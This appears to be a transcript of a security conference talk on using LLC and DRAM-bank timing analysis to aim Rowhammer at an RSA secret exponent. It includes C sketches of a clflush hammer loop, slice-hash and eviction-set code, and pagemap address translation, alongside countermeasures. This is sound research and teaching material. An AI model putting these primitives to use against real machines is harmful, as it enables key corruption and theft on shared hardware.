Good afternoon, everybody. I'm Sarani Bhattacharya, and I'm going to present "Curious Case of Rowhammer: Flipping Secret Exponent Bits Using Timing Analysis." First, a brief overview of what Rowhammer actually is, since it may be a new term for a few of you. Rowhammer is this: when you make repeated accesses to different rows in a particular DRAM bank, those repeated accesses cause the cells to be charged and discharged continuously. As a result, the adjacent cells electrically interact with one another, and some of them may lose charge, and that loss of charge can flip bits. So this is a fault that can be induced purely by software means, and it can have a great impact, as I will show. Our objective: we have developed a methodology that combines timing analysis with Rowhammer performed in a controlled manner, to create bit flips in a cryptographic secret that is stored in main memory. Let me briefly highlight our contributions. We combine the knowledge from the reverse engineering of LLC (last-level cache) slice addressing and DRAM addressing with timing side channels to determine the DRAM bank in which the secret actually resides. We then precisely trigger Rowhammer on addresses that map to the same bank as the secret, which inevitably increases the probability of a bit flip in the secret exponent, and we provide a concrete series of steps for this methodology. This is precisely the outline of my talk: first a brief introduction to the DRAM architecture and the Rowhammer vulnerability, then the methodology we have used, and then the experimental results. So I'll start with the Rowhammer DRAM vulnerability.
So first, a brief overview of the DRAM structure. DRAM is hierarchically composed of channels, ranks, and, inside those, banks. What exactly are they? The RAM modules you see in the slots on the PCB can be organized as single-channel or dual-channel; it depends on the system and the vendor. A channel is then divided into ranks, and each rank further into banks. Why is this required? Whenever RAM accesses are made, they can be served in parallel if they are addressed to different banks; but when they are addressed to the same bank, they are served sequentially, because each bank has a single row buffer. It is like a door: every access has to go through it. Whenever a read request is sent, that particular row is activated, its charge is transferred into the row buffer, and the reads and writes are served from that buffer. So continuous accesses to two different rows in the same bank repeatedly evict and reload the row buffer, which shows up as extra latency; this is the row-buffer conflict written on the slide. Next we go to Rowhammer itself. There is a small code segment here, given in the original paper published at ISCA 2014. It says: read address X, read address Y, then clflush addresses X and Y so they are removed from the cache; this ensures both of the next accesses are served from DRAM, and then we repeat. Now, if X and Y map to different rows of the same bank in the DRAM, the cells adjacent to those rows may lose charge, with non-negligible probability, and the adjacent rows will have flipped bits. This is a very simple example of how Rowhammer can be inflicted.
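The code segment from the ISCA 2014 paper can be sketched in C roughly as follows. This is a hedged illustration of the hammer loop, not the exact code from the paper; `clflush_addr` is a stand-in for the x86 CLFLUSH instruction, guarded so the sketch still compiles on other architectures (where a real attack would need some other flush primitive):

```c
#include <stdint.h>

/* Flush one cache line; on x86 this is the CLFLUSH instruction. */
static inline void clflush_addr(volatile void *p) {
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("clflush (%0)" : : "r"(p) : "memory");
#else
    (void)p; /* no-op elsewhere; a real attack needs a flush primitive */
#endif
}

/* Hammer two addresses: each read activates a DRAM row, and the flush
   guarantees the next iteration misses the cache and hits DRAM again. */
void hammer(volatile uint64_t *x, volatile uint64_t *y, long rounds) {
    for (long i = 0; i < rounds; i++) {
        (void)*x;                /* activate row of X        */
        (void)*y;                /* activate row of Y        */
        clflush_addr((void *)x); /* evict X from the cache   */
        clflush_addr((void *)y); /* evict Y from the cache   */
    }
}
```

If X and Y happen to fall in different rows of the same bank, this loop keeps toggling the bank's row buffer, which is exactly the access pattern that disturbs the adjacent rows.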
So then we go to the cache memory architecture, because we will need this in our methodology. We have a multi-core architecture; the first figure shows the cache architecture for Intel Ivy Bridge, where we have four cores, L1 and L2 are private to each core, while L3 is shared by all the cores. But L3 is divided into slices, which can be accessed in parallel by all four cores; this was introduced to improve parallel access patterns. The slice addressing is done using a complex addressing function, referred to here as a hash. This hash function is not disclosed by Intel, but some recent papers in 2015 have reverse engineered this LLC slice function, and they have come up with very interesting results: given a physical address, we can actually compute the cache slice to which it maps. The functions differ across architectures; the example given here is for Intel Ivy Bridge. So now, the attack model. What does the adversary aim at? The adversary aims to induce a bit flip in the secret exponent of the public-key exponentiation algorithm. The challenges involved are these: the secret resides at some arbitrary location in main memory, of which the adversary is oblivious. Secondly, the attacker has only user-level privileges, so he does not know the LLC set and slice, or the DRAM channel, rank, and bank, to which the secret maps. So in order to perform Rowhammer on precisely those locations, what he needs to learn is the bank in which the secret resides.
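The reverse-engineered slice functions all take the same shape: each bit of the slice index is the XOR (parity) of a selected subset of physical-address bits. A minimal sketch in C for a 4-core part with a 2-bit slice index; the two masks are placeholders for illustration, not the published Ivy Bridge constants:

```c
#include <stdint.h>

/* XOR-parity of the bits of v. */
static int parity64(uint64_t v) {
    v ^= v >> 32; v ^= v >> 16; v ^= v >> 8;
    v ^= v >> 4;  v ^= v >> 2;  v ^= v >> 1;
    return (int)(v & 1);
}

/* 2-bit slice id: each output bit is the parity of the physical-address
   bits selected by one mask. The masks are architecture-specific; the
   real values come from the 2015 reverse-engineering papers. */
int slice_id(uint64_t paddr, uint64_t mask_o0, uint64_t mask_o1) {
    return (parity64(paddr & mask_o1) << 1) | parity64(paddr & mask_o0);
}
```

Given the physical address of a candidate element, the spy evaluates this function to predict which slice the element will land in.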
So now imagine a situation where this adversary is given access to a decryption oracle: it sends ciphertexts to the oracle and observes the decrypted plaintext values. What will this result in? Since he is requesting decryptions frequently, the secret exponent will sit in the cache memory itself, and the accesses will not go to main memory at all; every access to the secret exponent results in a cache hit. This motivates the adversary to incorporate a spy process. What will the spy process do? It will evict the secret exponent from the cache and then run concurrently, performing a timing analysis to find out on which channel, rank, and bank the secret exponent is sitting. The methodology is as follows. First we determine the eviction set, which means finding out where the secret exponent sits in the cache. The spy initially allocates a large set of memory elements and finds their corresponding physical addresses by reading /proc/self/pagemap; this is available from user space for Linux kernels before version 4.0. Then the following happens. First the adversary initiates the spy; the spy creates a memory map and computes the addressing functions. Then, for the target set, it selects m elements that map to that particular cache set, for each of the cache slices; this it can do given the reverse-engineered functions. Now it will prime the LLC set and slices with those selected elements, and that becomes the eviction set. This process ensures that the spy has removed the secret exponent from that particular set and slice. Now the adversary sends the input to the decryption engine, and the decryption engine runs with the secret exponent.
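The selection of the colliding elements can be sketched like this. It is a hedged illustration: `SET_BITS`, the slice-hash masks, and the candidate-address array are all assumptions standing in for the machine-specific values the spy recovers from /proc/self/pagemap and the reverse-engineered functions:

```c
#include <stdint.h>
#include <stddef.h>

#define LINE_BITS 6  /* 64-byte cache lines */
#define SET_BITS 11  /* assumed sets per slice; machine-specific */

static int parity64(uint64_t v) {
    v ^= v >> 32; v ^= v >> 16; v ^= v >> 8;
    v ^= v >> 4;  v ^= v >> 2;  v ^= v >> 1;
    return (int)(v & 1);
}

static unsigned set_index(uint64_t paddr) {
    return (unsigned)((paddr >> LINE_BITS) & ((1u << SET_BITS) - 1));
}

/* Keep up to `need` candidate physical addresses that land in the
   victim's cache set and slice; mask_o0/mask_o1 are the (assumed)
   slice-hash masks. Accessing the returned addresses primes that set. */
size_t build_eviction_set(const uint64_t *cand, size_t n,
                          unsigned tgt_set, unsigned tgt_slice,
                          uint64_t mask_o0, uint64_t mask_o1,
                          uint64_t *out, size_t need) {
    size_t k = 0;
    for (size_t i = 0; i < n && k < need; i++) {
        unsigned slice = (unsigned)((parity64(cand[i] & mask_o1) << 1)
                                    | parity64(cand[i] & mask_o0));
        if (set_index(cand[i]) == tgt_set && slice == tgt_slice)
            out[k++] = cand[i];
    }
    return k;
}
```

With associativity m per slice, collecting m such addresses per slice is enough to evict whatever the victim had cached in that set.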
In step seven, the adversary receives the decrypted message and lets the spy run the probe phase, where it times the accesses to the eviction-set elements of that cache set and slice. What do we observe from this? Suppose the system has K processor cores, so the LLC has K slices, each with C sets and M ways; these parameters are more or less known to us. The spy chooses m × K selected elements for that particular set, covering all the slices, and does a simple prime-and-probe, repeating this over all the candidate sets. After that, it has to determine which slice the secret exponent actually belongs to, so it does prime-and-probe again, K times, each time with the M elements of one slice. What we expect is that for one particular slice, the timing analysis will give higher values than for the other slices. Then it determines the DRAM bank to which the secret maps. How? I have already described the row-buffer conflict: when two accesses conflict in the same DRAM bank, they are handled sequentially, which results in some latency, termed the row-buffer latency; if they are in different banks, they are served in parallel and there is no such latency. So what we expect is that when we make concurrent accesses to the same bank as the secret, we will observe higher timing values. Again we have a similar experimental scenario, but here the spy does something more: it determines the set and slice addresses, and also the channel, rank, and bank addressing. This addressing is likewise not revealed by the processor manufacturers, but it has been reverse engineered recently, in 2015, so using those functions the spy can compute it from the physical addresses.
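The decision rule in both searches is the same: pick the candidate (slice, or later bank) whose probe timings are on average the highest, since self-eviction in the slice case and a row-buffer conflict in the bank case both slow the spy down. A hedged sketch of that rule, with the timing matrix as input:

```c
#include <stddef.h>

/* t is a flattened ncand x nsamp matrix of probe timings (in cycles);
   return the candidate index with the highest mean timing. */
int slowest_candidate(const unsigned *t, size_t ncand, size_t nsamp) {
    int best = 0;
    double best_mean = -1.0;
    for (size_t c = 0; c < ncand; c++) {
        double sum = 0.0;
        for (size_t i = 0; i < nsamp; i++)
            sum += (double)t[c * nsamp + i];
        double mean = sum / (double)nsamp;
        if (mean > best_mean) { best_mean = mean; best = (int)c; }
    }
    return best;
}
```

In practice the raw samples are noisy, which is why the talk reports averaged distributions rather than single measurements.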
Then it picks a set C which acts as the eviction set and primes with it, so the secret element is now removed from the cache. Now it lets the adversary send the ciphertext to the decryption engine. While the decryption engine runs with the secret exponent, in parallel, in step nine, the spy randomly accesses elements mapping to a particular bank B and times those accesses. The result is that, after completing this for all the banks, one particular bank shows higher timing while the other banks show lower timing. So now we will start with the experimental validation and look at the results. First, a brief introduction to the setup: we have implemented this on 1024-bit RSA, implemented with the GNU MP library (the version number is on the slide, if anyone wants to know). The experiments are performed on an Intel Core i5 processor with the Ivy Bridge microarchitecture, running Ubuntu 12.04 with kernel version 3.2. The Linux kernel version being older than 4.0, we did not require any administrative privilege to run the entire attack. First, determining the sets and slices: as I have said, this is done by determining the physical addresses through /proc/self/pagemap, and the LLC slice functions are already there in the literature, where researchers have reverse engineered them. Using these functions we have selected 48 data elements, because our system has 12-way associativity and four cores: 12 elements for each of the four distinct cache slices, all mapping to the same cache set. What we observe for identifying the cache set: the red line shows the case with no collision and the blue line the case with collision. There are two sets for which we draw this figure, one having a collision and one having no collision.
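The /proc/self/pagemap lookup that the whole attack relies on can be sketched as below. The entry format (PFN in bits 0–54, a "present" flag in bit 63) is documented in the Linux kernel; on kernels from 4.0 onward an unprivileged read returns a zero PFN, which is exactly the privilege boundary mentioned in the talk:

```c
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>

/* Translate a virtual address to a physical address via pagemap.
   Returns 0 on failure, if the page is not present, or if the kernel
   hides the PFN from unprivileged callers (Linux >= 4.0). */
uint64_t virt_to_phys(uint64_t vaddr) {
    uint64_t psize = (uint64_t)sysconf(_SC_PAGESIZE);
    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) return 0;
    uint64_t entry = 0;
    off_t off = (off_t)(vaddr / psize) * 8;  /* one 8-byte entry per page */
    ssize_t got = pread(fd, &entry, sizeof entry, off);
    close(fd);
    if (got != (ssize_t)sizeof entry) return 0;
    if (!(entry & (1ULL << 63))) return 0;   /* page not present */
    uint64_t pfn = entry & ((1ULL << 55) - 1);
    return pfn * psize + vaddr % psize;
}
```

The spy runs this over its allocated pool once, then feeds the physical addresses into the set, slice, and bank functions.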
It is not entirely apparent from this figure, but if we take the average, the difference is approximately 80 clock cycles. This is because the eviction set we have used here is only a near-optimal eviction set; we have redone this experiment using the better eviction set described in the Rowhammer.js paper, and I will show those results later. Then, identifying the LLC slice using the reverse-engineered equations shown previously: in the graphs, slice zero is shown in red and slice two in blue, and the timing observations are taken during the probe phase. When the secret maps to slice zero, we expect slice zero to show higher timing values than slice two, and that is apparent from the first figure; on the other hand, when the secret maps to slice two, slice two shows higher values than slice zero, which is equally apparent. Now we move to the alternative strategies for the eviction-set selection and for the reverse-engineered functions. Figure (a) shows the alternative eviction set described in the Rowhammer.js paper, which was accepted this year at DIMVA, and figure (b) shows the cache slice functions described in another paper, which differ slightly from the equations we have shown previously. The results remain pretty much the same as before. Next we go to the DRAM bank addressing. What we found here is that the timing observations for a DRAM bank collision, in the first graph, are somewhat higher than in the second graph: there are values in the range of 550 to 750 cycles which are missing in the second graph. We have done this for all the banks and found the correct bank by this approach, though the result is not as clean as what we obtained for the LLC sets and slices.
One reason may be that we did not impose any concurrency between the spy and the process holding the secret, so there may be only a few cases where the row-buffer collision actually happened, while the other accesses were served in parallel; hence the noisier results, but we were still able to identify the bank. Next, we induced Rowhammer by repeatedly accessing the elements in that particular bank, and we counted the bit flips observed per bank index, which as you can see varies over indices 0 to 15; there are 16 banks in that particular DIMM. The number of bit flips is pretty huge; these results were collected over seven days of continuous execution, and after seven days we had observed this many flips, which is really scary. Next I'll talk about the countermeasures. Various countermeasures have been proposed since Rowhammer was discovered; I am listing the three most promising. Probabilistic adjacent row activation (PARA), proposed in the original Kim et al. ISCA 2014 paper, says: on each row activation, with a small probability, also refresh the adjacent rows; it has very low cost overhead. Targeted row refresh (TRR) says: when a particular row has been accessed beyond a limit, definitely refresh the adjacent rows. Then there is a software countermeasure named ANVIL, which uses hardware performance counters: if the cache misses cross a particular threshold, it inspects the DRAM accesses per bank, and if rows in a particular bank are being accessed more often than a threshold, it stops the execution and takes the necessary corrective action. There are, of course, certain limitations to our attack.
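PARA's behaviour is easy to model: every row activation independently triggers, with a small probability p, a refresh of the two physically adjacent rows. A toy Monte Carlo sketch of that idea (the probability value below is an illustrative parameter, not the one proposed in the paper):

```c
#include <stdlib.h>

/* Count how many of `activations` hammering activations would also
   refresh the victim's neighbouring rows under PARA with probability p.
   Each counted event stands for a refresh of rows r-1 and r+1. */
long para_refresh_count(long activations, double p, unsigned seed) {
    srand(seed);
    long refreshes = 0;
    for (long i = 0; i < activations; i++)
        if ((double)rand() / ((double)RAND_MAX + 1.0) < p)
            refreshes++;
    return refreshes;
}
```

The point of the scheme is that a heavily hammered row statistically refreshes its neighbours about p times per activation, far more often than the DRAM retention window requires, so the charge leakage never accumulates into a flip.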
The first thing we have assumed is that the secret decryption exponent resides at a fixed location in DRAM and is not swapped to a different page throughout the process; this is one of our assumptions. The second is that we have run this attack on an older version of the Linux kernel, 3.2, where it does not require any special privilege; after kernel 4.0 it would require administrative privileges. The third point is that the attack is equally relevant in a cross-VM setting, where the hardware is shared and the VMs do have administrative privileges within themselves, so it remains applicable there. The fourth point is that it is also relevant to customized embedded applications and other OSes which have not addressed this fault and still allow the unprivileged access. To summarize our work: we illustrate a combination of timing and fault analysis exploiting Rowhammer; the experiments involve a timing analysis whose variations lead to the identification of LLC sets and slices; the row-buffer collision has been exploited to identify the DRAM bank which actually holds the secret; and the proposed attack finds most relevance in a cross-VM setup where co-located VMs share the underlying hardware. So, thank you. — Thank you very much.